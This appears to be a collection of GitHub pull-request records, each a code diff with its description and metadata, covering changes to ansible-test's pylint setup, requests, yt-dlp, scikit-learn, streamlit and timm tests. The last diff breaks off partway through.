diff --git a/test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/tests/sanity/ignore.txt b/test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/tests/sanity/ignore.txt
index e1b3f4ca09dba7..dcbe827ca56de4 100644
--- a/test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/tests/sanity/ignore.txt
+++ b/test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/tests/sanity/ignore.txt
@@ -1,6 +1,7 @@
plugins/modules/bad.py import
plugins/modules/bad.py pylint:ansible-bad-module-import
plugins/lookup/bad.py import
+plugins/plugin_utils/check_pylint.py pylint:disallowed-name
tests/integration/targets/hello/files/bad.py pylint:ansible-bad-function
tests/integration/targets/hello/files/bad.py pylint:ansible-bad-import
tests/integration/targets/hello/files/bad.py pylint:ansible-bad-import-from
diff --git a/test/integration/targets/module_utils/library/test.py b/test/integration/targets/module_utils/library/test.py
index fb6c8a81c35c10..c8a5976cafb649 100644
--- a/test/integration/targets/module_utils/library/test.py
+++ b/test/integration/targets/module_utils/library/test.py
@@ -72,12 +72,12 @@
results['spam8'] = (bacon.data, eggs)
# Test that import of module_utils/qux1/quux.py using as works
-from ansible.module_utils.qux1 import quux as one
-results['qux1'] = one.data
+from ansible.module_utils.qux1 import quux as two
+results['qux1'] = two.data
# Test that importing qux2/quux.py and qux2/quuz.py using as works
-from ansible.module_utils.qux2 import quux as one, quuz as two
-results['qux2'] = (one.data, two.data)
+from ansible.module_utils.qux2 import quux as three, quuz as four
+results['qux2'] = (three.data, four.data)
# Test depth
from ansible.module_utils.a.b.c.d.e.f.g.h import data
diff --git a/test/lib/ansible_test/_data/requirements/sanity.pylint.in b/test/lib/ansible_test/_data/requirements/sanity.pylint.in
index ca9806651544b8..70010f95dad17f 100644
--- a/test/lib/ansible_test/_data/requirements/sanity.pylint.in
+++ b/test/lib/ansible_test/_data/requirements/sanity.pylint.in
@@ -1,2 +1,2 @@
-pylint == 2.15.10 # currently vetted version
+pylint == 2.16.0 # currently vetted version
pyyaml # needed for collection_detail.py
diff --git a/test/lib/ansible_test/_data/requirements/sanity.pylint.txt b/test/lib/ansible_test/_data/requirements/sanity.pylint.txt
index b13ad7675ff564..76aa07c17e9961 100644
--- a/test/lib/ansible_test/_data/requirements/sanity.pylint.txt
+++ b/test/lib/ansible_test/_data/requirements/sanity.pylint.txt
@@ -1,11 +1,11 @@
# edit "sanity.pylint.in" and generate with: hacking/update-sanity-requirements.py --test pylint
-astroid==2.13.3
+astroid==2.14.1
dill==0.3.6
-isort==5.11.4
+isort==5.12.0
lazy-object-proxy==1.9.0
mccabe==0.7.0
platformdirs==2.6.2
-pylint==2.15.10
+pylint==2.16.0
PyYAML==6.0
tomli==2.0.1
tomlkit==0.11.6
diff --git a/test/lib/ansible_test/_util/controller/sanity/pylint/config/ansible-test-target.cfg b/test/lib/ansible_test/_util/controller/sanity/pylint/config/ansible-test-target.cfg
index aa347729591d45..e35301dd81c1bd 100644
--- a/test/lib/ansible_test/_util/controller/sanity/pylint/config/ansible-test-target.cfg
+++ b/test/lib/ansible_test/_util/controller/sanity/pylint/config/ansible-test-target.cfg
@@ -10,6 +10,7 @@ disable=
raise-missing-from, # Python 2.x does not support raise from
super-with-arguments, # Python 2.x does not support super without arguments
redundant-u-string-prefix, # Python 2.x support still required
+ broad-exception-raised, # many exceptions with no need for a custom type
too-few-public-methods,
too-many-arguments,
too-many-branches,
@@ -19,6 +20,7 @@ disable=
too-many-nested-blocks,
too-many-return-statements,
too-many-statements,
+ use-dict-literal, # ignoring as a common style issue
useless-return, # complains about returning None when the return type is optional
[BASIC]
diff --git a/test/lib/ansible_test/_util/controller/sanity/pylint/config/ansible-test.cfg b/test/lib/ansible_test/_util/controller/sanity/pylint/config/ansible-test.cfg
index 1c03472c7b1bd8..bf7872d97a538f 100644
--- a/test/lib/ansible_test/_util/controller/sanity/pylint/config/ansible-test.cfg
+++ b/test/lib/ansible_test/_util/controller/sanity/pylint/config/ansible-test.cfg
@@ -8,6 +8,7 @@ disable=
duplicate-code, # consistent results require running with --jobs 1 and testing all files
import-outside-toplevel, # common pattern in ansible related code
raise-missing-from, # Python 2.x does not support raise from
+ broad-exception-raised, # many exceptions with no need for a custom type
too-few-public-methods,
too-many-public-methods,
too-many-arguments,
@@ -18,6 +19,7 @@ disable=
too-many-nested-blocks,
too-many-return-statements,
too-many-statements,
+ use-dict-literal, # ignoring as a common style issue
unspecified-encoding, # always run with UTF-8 encoding enforced
useless-return, # complains about returning None when the return type is optional
diff --git a/test/lib/ansible_test/_util/controller/sanity/pylint/config/code-smell.cfg b/test/lib/ansible_test/_util/controller/sanity/pylint/config/code-smell.cfg
index e3aa8eedcc8653..c30eb37a749850 100644
--- a/test/lib/ansible_test/_util/controller/sanity/pylint/config/code-smell.cfg
+++ b/test/lib/ansible_test/_util/controller/sanity/pylint/config/code-smell.cfg
@@ -17,6 +17,7 @@ disable=
too-many-nested-blocks,
too-many-return-statements,
too-many-statements,
+ use-dict-literal, # ignoring as a common style issue
unspecified-encoding, # always run with UTF-8 encoding enforced
useless-return, # complains about returning None when the return type is optional
diff --git a/test/lib/ansible_test/_util/controller/sanity/pylint/config/collection.cfg b/test/lib/ansible_test/_util/controller/sanity/pylint/config/collection.cfg
index 38b8d2d0152fee..78064542f9038f 100644
--- a/test/lib/ansible_test/_util/controller/sanity/pylint/config/collection.cfg
+++ b/test/lib/ansible_test/_util/controller/sanity/pylint/config/collection.cfg
@@ -9,7 +9,8 @@ disable=
attribute-defined-outside-init,
bad-indentation,
bad-mcs-classmethod-argument,
- broad-except,
+ broad-exception-caught,
+ broad-exception-raised,
c-extension-no-member,
cell-var-from-loop,
chained-comparison,
@@ -113,7 +114,7 @@ disable=
unused-import,
unused-variable,
unspecified-encoding, # always run with UTF-8 encoding enforced
- use-dict-literal, # many occurrences
+ use-dict-literal, # ignoring as a common style issue
use-list-literal, # many occurrences
use-implicit-booleaness-not-comparison, # many occurrences
useless-object-inheritance,
diff --git a/test/lib/ansible_test/_util/controller/sanity/pylint/config/default.cfg b/test/lib/ansible_test/_util/controller/sanity/pylint/config/default.cfg
index 6a242b8dee33ca..00b31ece78b4e8 100644
--- a/test/lib/ansible_test/_util/controller/sanity/pylint/config/default.cfg
+++ b/test/lib/ansible_test/_util/controller/sanity/pylint/config/default.cfg
@@ -10,7 +10,8 @@ disable=
attribute-defined-outside-init,
bad-indentation,
bad-mcs-classmethod-argument,
- broad-except,
+ broad-exception-caught,
+ broad-exception-raised,
c-extension-no-member,
cell-var-from-loop,
chained-comparison,
@@ -108,7 +109,7 @@ disable=
unused-import,
unused-variable,
unspecified-encoding, # always run with UTF-8 encoding enforced
- use-dict-literal, # many occurrences
+ use-dict-literal, # ignoring as a common style issue
use-list-literal, # many occurrences
use-implicit-booleaness-not-comparison, # many occurrences
useless-object-inheritance,
diff --git a/test/sanity/ignore.txt b/test/sanity/ignore.txt
index c50bd9dc5a7693..b0de6515b46566 100644
--- a/test/sanity/ignore.txt
+++ b/test/sanity/ignore.txt
@@ -129,6 +129,7 @@ lib/ansible/vars/hostvars.py pylint:disallowed-name
test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/tests/integration/targets/hello/files/bad.py pylint:ansible-bad-function # ignore, required for testing
test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/tests/integration/targets/hello/files/bad.py pylint:ansible-bad-import-from # ignore, required for testing
test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/tests/integration/targets/hello/files/bad.py pylint:ansible-bad-import # ignore, required for testing
+test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/plugins/plugin_utils/check_pylint.py pylint:disallowed-name # ignore, required for testing
test/integration/targets/ansible-test-integration/ansible_collections/ns/col/plugins/modules/hello.py pylint:relative-beyond-top-level
test/integration/targets/ansible-test-units/ansible_collections/ns/col/plugins/modules/hello.py pylint:relative-beyond-top-level
test/integration/targets/ansible-test-units/ansible_collections/ns/col/tests/unit/plugins/modules/test_hello.py pylint:relative-beyond-top-level
@@ -192,6 +193,7 @@ test/support/network-integration/collections/ansible_collections/ansible/netcomm
test/support/network-integration/collections/ansible_collections/ansible/netcommon/plugins/netconf/default.py pylint:unnecessary-comprehension
test/support/network-integration/collections/ansible_collections/cisco/ios/plugins/cliconf/ios.py pylint:arguments-renamed
test/support/network-integration/collections/ansible_collections/cisco/ios/plugins/modules/ios_config.py pep8:E501
+test/support/network-integration/collections/ansible_collections/cisco/ios/plugins/modules/ios_config.py pylint:used-before-assignment
test/support/network-integration/collections/ansible_collections/vyos/vyos/plugins/cliconf/vyos.py pylint:arguments-renamed
test/support/network-integration/collections/ansible_collections/vyos/vyos/plugins/modules/vyos_command.py pep8:E231
test/support/network-integration/collections/ansible_collections/vyos/vyos/plugins/modules/vyos_command.py pylint:disallowed-name
| ##### SUMMARY
ansible-test - Update pylint to 2.16.0.
##### ISSUE TYPE
Feature Pull Request
##### COMPONENT NAME
ansible-test
##### ADDITIONAL INFORMATION
Omitting a changelog fragment, since this is a follow-up to https://github.com/ansible/ansible/pull/79819
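For illustration, these are the kinds of constructs the updated configs now explicitly ignore (made-up snippet, not ansible code):

```python
# Both constructs below are flagged by pylint 2.16 unless the corresponding
# checks are disabled, as the updated configs do:
options = dict(a=1, b=2)  # use-dict-literal: prefer {"a": 1, "b": 2}

if not options:
    raise Exception("something went wrong")  # broad-exception-raised
```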
| https://api.github.com/repos/ansible/ansible/pulls/79878 | 2023-02-01T18:59:40Z | 2023-02-01T20:40:36Z | 2023-02-01T20:40:36Z | 2023-02-08T14:00:08Z | 3,032 | ansible/ansible | 49,211 |
Document header ordering caveats. | diff --git a/docs/user/advanced.rst b/docs/user/advanced.rst
index 8264e85d5b..cf0143ce6c 100644
--- a/docs/user/advanced.rst
+++ b/docs/user/advanced.rst
@@ -208,7 +208,7 @@ You can pass ``verify`` the path to a CA_BUNDLE file or directory with certifica
>>> requests.get('https://github.com', verify='/path/to/certfile')
-.. note:: If ``verify`` is set to a path to a directory, the directory must have been processed using
+.. note:: If ``verify`` is set to a path to a directory, the directory must have been processed using
the c_rehash utility supplied with OpenSSL.
This list of trusted CAs can also be specified through the ``REQUESTS_CA_BUNDLE`` environment variable.
@@ -899,6 +899,13 @@ Two excellent examples are `grequests`_ and `requests-futures`_.
.. _`grequests`: https://github.com/kennethreitz/grequests
.. _`requests-futures`: https://github.com/ross/requests-futures
+Header Ordering
+---------------
+
+In unusual circumstances you may want to provide headers in an ordered manner. If you pass an ``OrderedDict`` to the ``headers`` keyword argument, that will provide the headers with an ordering. *However*, the ordering of the default headers used by requests will be preferred, which means that if you override default headers in the ``headers`` keyword argument, they may appear out of order compared to other headers in that keyword argument.
+
+If this is problematic, users should consider setting the default headers on a :class:`Session <requests.Session>` object, by setting :data:`Session <requests.Session.headers>` to a custom ``OrderedDict``. That ordering will always be preferred.
+
.. _timeouts:
Timeouts
| Resolves #3096.
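A short sketch of the Session-level workaround the new section describes (the URL is just an example):

```python
from collections import OrderedDict

import requests

session = requests.Session()
# Ordering set on the session's default headers is always preferred, unlike
# per-request header overrides.
session.headers = OrderedDict([
    ("User-Agent", "my-client/1.0"),
    ("Accept", "*/*"),
])
response = session.get("https://httpbin.org/headers")
```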
| https://api.github.com/repos/psf/requests/pulls/3295 | 2016-06-08T15:26:13Z | 2016-06-08T16:44:33Z | 2016-06-08T16:44:33Z | 2021-09-02T00:07:36Z | 408 | psf/requests | 32,646 |
[mixcloud] add restriction detection | diff --git a/yt_dlp/extractor/mixcloud.py b/yt_dlp/extractor/mixcloud.py
index a0c043d4bd3..c2dd078ac42 100644
--- a/yt_dlp/extractor/mixcloud.py
+++ b/yt_dlp/extractor/mixcloud.py
@@ -12,6 +12,7 @@
compat_zip
)
from ..utils import (
+ ExtractorError,
int_or_none,
parse_iso8601,
strip_or_none,
@@ -125,7 +126,20 @@ def _real_extract(self, url):
tag {
name
}
- }''', track_id, username, slug)
+ }
+ restrictedReason
+ id''', track_id, username, slug)
+
+ if not cloudcast:
+ raise ExtractorError('Track not found', expected=True)
+
+ reason = cloudcast.get('restrictedReason')
+ if reason == 'tracklist':
+ raise ExtractorError('Track unavailable in your country due to licensing restrictions', expected=True)
+ elif reason == 'repeat_play':
+ raise ExtractorError('You have reached your play limit for this track', expected=True)
+ elif reason:
+ raise ExtractorError('Track is restricted', expected=True)
title = cloudcast['name']
| ## Please follow the guide below
- You will be asked some questions, please read them **carefully** and answer honestly
- Put an `x` into all the boxes [ ] relevant to your *pull request* (like that [x])
- Use *Preview* tab to see how your *pull request* will actually look like
---
### Before submitting a *pull request* make sure you have:
- [x] At least skimmed through [contributing guidelines](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) including [yt-dlp coding conventions](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#yt-dlp-coding-conventions)
- [x] [Searched](https://github.com/yt-dlp/yt-dlp/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests
- [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8)
### In order to be accepted and merged into yt-dlp each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options:
- [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/)
- [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence)
### What is the purpose of your *pull request*?
- [ ] Bug fix
- [x] Improvement
- [ ] New extractor
- [ ] New feature
---
### Description of your *pull request* and other information
Some tracks on Mixcloud can be restricted from being played. This patch adds proper detection of such restrictions, and also throws an error when a track is not found.
Example track with a licensing restriction: `https://www.mixcloud.com/mistabibs/mista-bibs-modelling-network-best-of-akon/`
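Condensed, the new restriction handling amounts to the following (a restatement of the diff's logic, not additional behavior):

```python
from yt_dlp.utils import ExtractorError

RESTRICTION_MESSAGES = {
    'tracklist': 'Track unavailable in your country due to licensing restrictions',
    'repeat_play': 'You have reached your play limit for this track',
}

def check_restriction(cloudcast):
    if not cloudcast:
        raise ExtractorError('Track not found', expected=True)
    reason = cloudcast.get('restrictedReason')
    if reason:
        raise ExtractorError(
            RESTRICTION_MESSAGES.get(reason, 'Track is restricted'),
            expected=True,
        )
```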
| https://api.github.com/repos/yt-dlp/yt-dlp/pulls/2169 | 2021-12-30T05:16:52Z | 2021-12-31T20:11:35Z | 2021-12-31T20:11:35Z | 2021-12-31T20:11:36Z | 298 | yt-dlp/yt-dlp | 7,330 |
[MRG + 1] Ensuring that the OneHotEncoder outputs sparse matrix with given dtype #11034 | diff --git a/doc/whats_new/v0.20.rst b/doc/whats_new/v0.20.rst
index 0e206878862ae..d735b09d7b7af 100644
--- a/doc/whats_new/v0.20.rst
+++ b/doc/whats_new/v0.20.rst
@@ -496,6 +496,10 @@ Preprocessing
``inverse_transform`` on unseen labels. :issue:`9816` by :user:`Charlie Newey
<newey01c>`.
+- Fix bug in :class:`preprocessing.OneHotEncoder` which discarded the ``dtype``
+ when returning a sparse matrix output. :issue:`11042` by :user:`Daniel
+ Morales <DanielMorales9>`.
+
Feature selection
- Fixed computation of ``n_features_to_compute`` for edge case with tied CV
diff --git a/sklearn/preprocessing/data.py b/sklearn/preprocessing/data.py
index fb8f443e9c7ac..4df7c295bd834 100644
--- a/sklearn/preprocessing/data.py
+++ b/sklearn/preprocessing/data.py
@@ -1825,7 +1825,7 @@ def add_dummy_feature(X, value=1.0):
return np.hstack((np.ones((n_samples, 1)) * value, X))
-def _transform_selected(X, transform, selected="all", copy=True):
+def _transform_selected(X, transform, dtype, selected="all", copy=True):
"""Apply a transform function to portion of selected features
Parameters
@@ -1836,6 +1836,9 @@ def _transform_selected(X, transform, selected="all", copy=True):
transform : callable
A callable transform(X) -> X_transformed
+ dtype : number type
+ Desired dtype of output.
+
copy : boolean, optional
Copy X even if it could be avoided.
@@ -1869,7 +1872,10 @@ def _transform_selected(X, transform, selected="all", copy=True):
return transform(X)
else:
X_sel = transform(X[:, ind[sel]])
- X_not_sel = X[:, ind[not_sel]]
+ # The columns of X which are not transformed need
+ # to be casted to the desire dtype before concatenation.
+ # Otherwise, the stacking will cast to the higher-precision dtype.
+ X_not_sel = X[:, ind[not_sel]].astype(dtype)
if sparse.issparse(X_sel) or sparse.issparse(X_not_sel):
return sparse.hstack((X_sel, X_not_sel))
@@ -2061,7 +2067,7 @@ def fit_transform(self, X, y=None):
X : array-like, shape [n_samples, n_feature]
Input array of type int.
"""
- return _transform_selected(X, self._fit_transform,
+ return _transform_selected(X, self._fit_transform, self.dtype,
self.categorical_features, copy=True)
def _transform(self, X):
@@ -2117,7 +2123,7 @@ def transform(self, X):
X_out : sparse matrix if sparse=True else a 2-d array, dtype=int
Transformed input.
"""
- return _transform_selected(X, self._transform,
+ return _transform_selected(X, self._transform, self.dtype,
self.categorical_features, copy=True)
diff --git a/sklearn/preprocessing/tests/test_data.py b/sklearn/preprocessing/tests/test_data.py
index e3bf4096750de..e194802ef2fe5 100644
--- a/sklearn/preprocessing/tests/test_data.py
+++ b/sklearn/preprocessing/tests/test_data.py
@@ -1909,40 +1909,45 @@ def test_one_hot_encoder_dense():
[1., 0., 1., 0., 1.]]))
-def _check_transform_selected(X, X_expected, sel):
+def _check_transform_selected(X, X_expected, dtype, sel):
for M in (X, sparse.csr_matrix(X)):
- Xtr = _transform_selected(M, Binarizer().transform, sel)
+ Xtr = _transform_selected(M, Binarizer().transform, dtype, sel)
assert_array_equal(toarray(Xtr), X_expected)
-def test_transform_selected():
- X = [[3, 2, 1], [0, 1, 1]]
+@pytest.mark.parametrize("output_dtype", [np.int32, np.float32, np.float64])
+@pytest.mark.parametrize("input_dtype", [np.int32, np.float32, np.float64])
+def test_transform_selected(output_dtype, input_dtype):
+ X = np.asarray([[3, 2, 1], [0, 1, 1]], dtype=input_dtype)
- X_expected = [[1, 2, 1], [0, 1, 1]]
- _check_transform_selected(X, X_expected, [0])
- _check_transform_selected(X, X_expected, [True, False, False])
+ X_expected = np.asarray([[1, 2, 1], [0, 1, 1]], dtype=output_dtype)
+ _check_transform_selected(X, X_expected, output_dtype, [0])
+ _check_transform_selected(X, X_expected, output_dtype,
+ [True, False, False])
- X_expected = [[1, 1, 1], [0, 1, 1]]
- _check_transform_selected(X, X_expected, [0, 1, 2])
- _check_transform_selected(X, X_expected, [True, True, True])
- _check_transform_selected(X, X_expected, "all")
+ X_expected = np.asarray([[1, 1, 1], [0, 1, 1]], dtype=output_dtype)
+ _check_transform_selected(X, X_expected, output_dtype, [0, 1, 2])
+ _check_transform_selected(X, X_expected, output_dtype, [True, True, True])
+ _check_transform_selected(X, X_expected, output_dtype, "all")
- _check_transform_selected(X, X, [])
- _check_transform_selected(X, X, [False, False, False])
+ _check_transform_selected(X, X, output_dtype, [])
+ _check_transform_selected(X, X, output_dtype, [False, False, False])
-def test_transform_selected_copy_arg():
+@pytest.mark.parametrize("output_dtype", [np.int32, np.float32, np.float64])
+@pytest.mark.parametrize("input_dtype", [np.int32, np.float32, np.float64])
+def test_transform_selected_copy_arg(output_dtype, input_dtype):
# transformer that alters X
def _mutating_transformer(X):
X[0, 0] = X[0, 0] + 1
return X
- original_X = np.asarray([[1, 2], [3, 4]])
- expected_Xtr = [[2, 2], [3, 4]]
+ original_X = np.asarray([[1, 2], [3, 4]], dtype=input_dtype)
+ expected_Xtr = np.asarray([[2, 2], [3, 4]], dtype=output_dtype)
X = original_X.copy()
- Xtr = _transform_selected(X, _mutating_transformer, copy=True,
- selected='all')
+ Xtr = _transform_selected(X, _mutating_transformer, output_dtype,
+ copy=True, selected='all')
assert_array_equal(toarray(X), toarray(original_X))
assert_array_equal(toarray(Xtr), expected_Xtr)
@@ -1987,6 +1992,17 @@ def test_one_hot_encoder_categorical_features():
_check_one_hot(X, X2, cat, 5)
+@pytest.mark.parametrize("output_dtype", [np.int32, np.float32, np.float64])
+@pytest.mark.parametrize("input_dtype", [np.int32, np.float32, np.float64])
+@pytest.mark.parametrize("sparse", [True, False])
+def test_one_hot_encoder_preserve_type(input_dtype, output_dtype, sparse):
+ X = np.array([[0, 1, 0, 0], [1, 2, 0, 0]], dtype=input_dtype)
+ transformer = OneHotEncoder(categorical_features=[0, 1],
+ dtype=output_dtype, sparse=sparse)
+ X_trans = transformer.fit_transform(X)
+ assert X_trans.dtype == output_dtype
+
+
def test_one_hot_encoder_unknown_transform():
X = np.array([[0, 2, 1], [1, 0, 3], [1, 0, 2]])
y = np.array([[4, 1, 1]])
| #### Reference Issues/PRs
Original discussion at #11034
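A minimal sketch of the behaviour the new tests pin down, using the scikit-learn API of that era (`categorical_features` has since been removed from `OneHotEncoder`):

```python
import numpy as np
from sklearn.preprocessing import OneHotEncoder

# Input dtype and requested output dtype differ on purpose.
X = np.array([[0, 1, 0, 0], [1, 2, 0, 0]], dtype=np.float32)
enc = OneHotEncoder(categorical_features=[0, 1], dtype=np.int32, sparse=True)
X_trans = enc.fit_transform(X)
assert X_trans.dtype == np.int32  # output uses the requested dtype, not float32
```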
| https://api.github.com/repos/scikit-learn/scikit-learn/pulls/11042 | 2018-04-28T11:35:27Z | 2018-06-06T08:59:28Z | 2018-06-06T08:59:28Z | 2018-06-06T09:00:22Z | 1,933 | scikit-learn/scikit-learn | 46,294 |
Fixed issue #2756 | diff --git a/requests/models.py b/requests/models.py
index 4270c647eb..06e843623e 100644
--- a/requests/models.py
+++ b/requests/models.py
@@ -414,7 +414,7 @@ def prepare_body(self, data, files, json=None):
content_type = None
length = None
- if json is not None:
+ if data == {} and json is not None:
content_type = 'application/json'
body = complexjson.dumps(json)
@@ -443,7 +443,7 @@ def prepare_body(self, data, files, json=None):
if files:
(body, content_type) = self._encode_files(files, data)
else:
- if data and json is None:
+ if data:
body = self._encode_params(data)
if isinstance(data, basestring) or hasattr(data, 'read'):
content_type = None
diff --git a/test_requests.py b/test_requests.py
index 28ea5730d8..b5be37fc83 100755
--- a/test_requests.py
+++ b/test_requests.py
@@ -1062,6 +1062,13 @@ def test_json_param_post_content_type_works(self):
assert 'application/json' in r.request.headers['Content-Type']
assert {'life': 42} == r.json()['json']
+ def test_json_param_post_should_not_override_data_param(self):
+ r = requests.Request(method='POST', url='http://httpbin.org/post',
+ data={'stuff': 'elixr'},
+ json={'music': 'flute'})
+ prep = r.prepare()
+ assert 'stuff=elixr' == prep.body
+
def test_response_iter_lines(self):
r = requests.get(httpbin('stream/4'), stream=True)
assert r.status_code == 200
| Now the 'json' parameter will be used to prepare the body only if the 'data'
parameter is not present.
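A sketch of the resulting precedence, mirroring the new test (the request is only prepared, never sent):

```python
import requests

req = requests.Request(method='POST', url='http://httpbin.org/post',
                       data={'stuff': 'elixr'},
                       json={'music': 'flute'})
prep = req.prepare()
# 'data' wins: the body is form-encoded and 'json' is ignored
assert prep.body == 'stuff=elixr'
```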
| https://api.github.com/repos/psf/requests/pulls/2763 | 2015-09-08T09:19:51Z | 2015-10-05T14:27:53Z | 2015-10-05T14:27:53Z | 2021-09-08T05:01:00Z | 406 | psf/requests | 32,569 |
List `str` as supported type for `show_spinner` in cache data docs | diff --git a/lib/streamlit/runtime/caching/cache_data_api.py b/lib/streamlit/runtime/caching/cache_data_api.py
index 47f9d284eb06..2e738ef447b2 100644
--- a/lib/streamlit/runtime/caching/cache_data_api.py
+++ b/lib/streamlit/runtime/caching/cache_data_api.py
@@ -413,9 +413,10 @@ def _decorator(
for an unbounded cache. (When a new entry is added to a full cache,
the oldest cached entry will be removed.) The default is None.
- show_spinner : boolean
+ show_spinner : boolean or string
Enable the spinner. Default is True to show a spinner when there is
- a cache miss.
+ a "cache miss" and the cached data is being created. If string,
+ value of show_spinner param will be used for spinner text.
persist : str or boolean or None
Optional location to persist cached data to. Passing "disk" (or True)
@@ -574,7 +575,6 @@ def __init__(
self.allow_widgets = allow_widgets
def get_stats(self) -> list[CacheStat]:
-
if isinstance(self.storage, CacheStatsProvider):
return self.storage.get_stats()
return []
| ## 📚 Context
Fixes #6207.
- What kind of change does this PR introduce?
- [x] Bugfix
- [ ] Feature
- [ ] Refactoring
- [x] Other, please describe: Doc improvement request
## 🧠 Description of Changes
- Adds `str` as a supported type for `st.cache_data`'s `show_spinner` param in the docstring.
- Note: this PR neither adds nor updates any tests as it is merely refactoring docstring text.
- [ ] This is a breaking API change
- [x] This is a visible (user-facing) change
<details><summary><h4>View revised:</h4></summary>
![image](https://user-images.githubusercontent.com/20672874/222631326-6968f7ba-dbd9-40e3-afb5-c85d45dfc8c7.png)
</details>
<details><summary><h4>View current:</h4></summary>
![image](https://user-images.githubusercontent.com/20672874/222631509-87cb72f5-16e1-40a8-ace9-f79bd988de61.png)
</details>
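For reference, a minimal sketch of the documented string form (hypothetical loader; illustrative only):

```python
import time
import streamlit as st

# A string value for show_spinner becomes the spinner text.
@st.cache_data(show_spinner="Fetching data...")
def load_data(n: int) -> list:
    time.sleep(2)  # simulate a slow fetch
    return list(range(n))

data = load_data(1000)
```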
## 🧪 Testing Done
- [x] Screenshots included
## 🌐 References
_Does this depend on other work, documents, or tickets?_
- **Issue**: Closes #6207
---
**Contribution License Agreement**
By submitting this pull request you agree that all contributions to this project are made under the Apache 2.0 license.
| https://api.github.com/repos/streamlit/streamlit/pulls/6213 | 2023-03-03T04:30:46Z | 2023-03-03T14:49:34Z | 2023-03-03T14:49:34Z | 2023-10-05T19:29:36Z | 275 | streamlit/streamlit | 22,536 |
Device agnostic testing | diff --git a/tests/test_layers.py b/tests/test_layers.py
index da061870ab..92f6b683d3 100644
--- a/tests/test_layers.py
+++ b/tests/test_layers.py
@@ -3,6 +3,13 @@
from timm.layers import create_act_layer, set_layer_config
+import importlib
+import os
+
+torch_backend = os.environ.get('TORCH_BACKEND')
+if torch_backend is not None:
+ importlib.import_module(torch_backend)
+torch_device = os.environ.get('TORCH_DEVICE', 'cpu')
class MLP(nn.Module):
def __init__(self, act_layer="relu", inplace=True):
@@ -30,6 +37,9 @@ def _run(x, act_layer=''):
l = (out - 0).pow(2).sum()
return l
+ x = x.to(device=torch_device)
+ m.to(device=torch_device)
+
out_me = _run(x)
with set_layer_config(scriptable=True):
diff --git a/tests/test_models.py b/tests/test_models.py
index b1b2bf195a..a6411a7856 100644
--- a/tests/test_models.py
+++ b/tests/test_models.py
@@ -30,6 +30,17 @@
from timm.layers import Format, get_spatial_dim, get_channel_dim
from timm.models import get_notrace_modules, get_notrace_functions
+import importlib
+import os
+
+torch_backend = os.environ.get('TORCH_BACKEND')
+if torch_backend is not None:
+ importlib.import_module(torch_backend)
+torch_device = os.environ.get('TORCH_DEVICE', 'cpu')
+timeout = os.environ.get('TIMEOUT')
+timeout120 = int(timeout) if timeout else 120
+timeout300 = int(timeout) if timeout else 300
+
if hasattr(torch._C, '_jit_set_profiling_executor'):
# legacy executor is too slow to compile large models for unit tests
# no need for the fusion performance here
@@ -100,7 +111,7 @@ def _get_input_size(model=None, model_name='', target=None):
@pytest.mark.base
-@pytest.mark.timeout(120)
+@pytest.mark.timeout(timeout120)
@pytest.mark.parametrize('model_name', list_models(exclude_filters=EXCLUDE_FILTERS))
@pytest.mark.parametrize('batch_size', [1])
def test_model_forward(model_name, batch_size):
@@ -112,6 +123,8 @@ def test_model_forward(model_name, batch_size):
if max(input_size) > MAX_FWD_SIZE:
pytest.skip("Fixed input size model > limit.")
inputs = torch.randn((batch_size, *input_size))
+ inputs = inputs.to(torch_device)
+ model.to(torch_device)
outputs = model(inputs)
assert outputs.shape[0] == batch_size
@@ -119,7 +132,7 @@ def test_model_forward(model_name, batch_size):
@pytest.mark.base
-@pytest.mark.timeout(120)
+@pytest.mark.timeout(timeout120)
@pytest.mark.parametrize('model_name', list_models(exclude_filters=EXCLUDE_FILTERS, name_matches_cfg=True))
@pytest.mark.parametrize('batch_size', [2])
def test_model_backward(model_name, batch_size):
@@ -133,6 +146,8 @@ def test_model_backward(model_name, batch_size):
model.train()
inputs = torch.randn((batch_size, *input_size))
+ inputs = inputs.to(torch_device)
+ model.to(torch_device)
outputs = model(inputs)
if isinstance(outputs, tuple):
outputs = torch.cat(outputs)
@@ -147,7 +162,7 @@ def test_model_backward(model_name, batch_size):
@pytest.mark.cfg
-@pytest.mark.timeout(300)
+@pytest.mark.timeout(timeout300)
@pytest.mark.parametrize('model_name', list_models(
exclude_filters=EXCLUDE_FILTERS + NON_STD_FILTERS, include_tags=True))
@pytest.mark.parametrize('batch_size', [1])
@@ -155,6 +170,7 @@ def test_model_default_cfgs(model_name, batch_size):
"""Run a single forward pass with each model"""
model = create_model(model_name, pretrained=False)
model.eval()
+ model.to(torch_device)
state_dict = model.state_dict()
cfg = model.default_cfg
@@ -169,7 +185,7 @@ def test_model_default_cfgs(model_name, batch_size):
not any([fnmatch.fnmatch(model_name, x) for x in EXCLUDE_FILTERS]):
# output sizes only checked if default res <= 448 * 448 to keep resource down
input_size = tuple([min(x, MAX_FWD_OUT_SIZE) for x in input_size])
- input_tensor = torch.randn((batch_size, *input_size))
+ input_tensor = torch.randn((batch_size, *input_size), device=torch_device)
# test forward_features (always unpooled)
outputs = model.forward_features(input_tensor)
@@ -180,12 +196,14 @@ def test_model_default_cfgs(model_name, batch_size):
# test forward after deleting the classifier, output should be poooled, size(-1) == model.num_features
model.reset_classifier(0)
+ model.to(torch_device)
outputs = model.forward(input_tensor)
assert len(outputs.shape) == 2
assert outputs.shape[1] == model.num_features
# test model forward without pooling and classifier
model.reset_classifier(0, '') # reset classifier and set global pooling to pass-through
+ model.to(torch_device)
outputs = model.forward(input_tensor)
assert len(outputs.shape) == 4
if not isinstance(model, (timm.models.MobileNetV3, timm.models.GhostNet, timm.models.RepGhostNet, timm.models.VGG)):
@@ -195,6 +213,7 @@ def test_model_default_cfgs(model_name, batch_size):
if 'pruned' not in model_name: # FIXME better pruned model handling
